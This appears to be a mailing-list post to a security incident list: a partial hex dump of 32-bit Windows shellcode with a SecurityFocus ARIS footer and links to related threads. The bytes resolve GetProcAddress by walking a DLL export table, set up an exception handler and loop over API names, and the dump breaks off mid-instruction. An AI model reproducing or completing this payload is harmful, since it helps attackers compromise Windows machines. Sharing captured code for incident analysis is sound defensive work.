4C 33 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D | L32.. .....X.....
34 FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03 | 4.....T.....X....
42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00 00 | B ..L.....H......
00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48 FE FF | .....H........H..
FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE FF FF 8B | ...L........L....
85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48 18 0F 8D C0 | .T.....H...;H....
00 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF | .....L.......X...
81 3C 01 47 65 74 50 0F 85 A0 00 00 00 8B 95 4C FE | .<.GetP........L.
FF FF 8B 02 8B 8D 58 FE FF FF 81 7C 01 04 72 6F 63 | ......X....|..roc
41 0F 85 84 00 00 00 8B 95 48 FE FF FF 03 95 48 FE | A........H.....H.
FF FF 03 95 58 FE FF FF 8B 85 54 FE FF FF 8B 48 24 | ....X.....T....H$
33 C0 66 8B 04 0A 89 85 4C FE FF FF 8B 8D 54 FE FF | 3.f.....L.....T..
FF 8B 51 10 8B 85 4C FE FF FF 8D 4C 10 FF 89 8D 4C | ..Q...L....L....L
FE FF FF 8B 95 4C FE FF FF 03 95 4C FE FF FF 03 95 | .....L.....L.....
4C FE FF FF 03 95 4C FE FF FF 03 95 58 FE FF FF 8B | L.....L.....X....
85 54 FE FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF | .T....H......L...
8B 85 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF | ..L.....X.....p..
FF EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE | .................
FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF FF | ...G.d.......p...
00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01 00 00 | .u..8.....L......
00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D 4C FE FF | .....L........L..
FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F 84 8D 00 00 | ...h.............
00 8B 8D 68 FE FF FF 0F BE 11 83 FA 09 75 21 8B 85 | ...h.........u!..
68 FE FF FF 83 C0 01 8B F4 50 FF 95 90 FE FF FF 3B | h........P......;
F4 90 43 4B 43 4B 89 85 34 FE FF FF EB 2A 8B F4 8B | ..CKCK..4....*...
8D 68 FE FF FF 51 8B 95 34 FE FF FF 52 FF 95 70 FE | .h...Q..4...R..p.
FF FF 3B F4 90 43 4B 43 4B 8B 8D 4C FE FF FF 89 84 | ..;..CKCK..L.....
8D 8C FE FF FF EB 0F 8B 95 68 FE FF FF 83 C2 01 89 | .........h.......
95 68 FE FF FF 8B 85 68 FE FF FF 0F BE 08 85 C9 74 | .h.....h........t
02 EB E2 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF | .....h........h..
FF E9 53 FF FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 | ..S.....h........
68 FE FF FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE | h....M.........l.
FF FF C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 | ....L..........

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com



Relevant Pages

  • Re: Slapper questions
    ... Take the system off the network (letting management know why) ... > I'm trying to learn more about how the Apache/mod_ssl worm variants operate. ... I blocked port 443 on my firewall. ... Those checks showed no presence of the .bugtraq process. ...
    (Incidents)
  • Re: Teleport for Newbies
    ... > management than a certain pseudo-Tolkienian roguelike and its variants ... Ok, it's late, my brain is jelly (and I'm about to start another game:-D ...
    (rec.games.roguelike.nethack)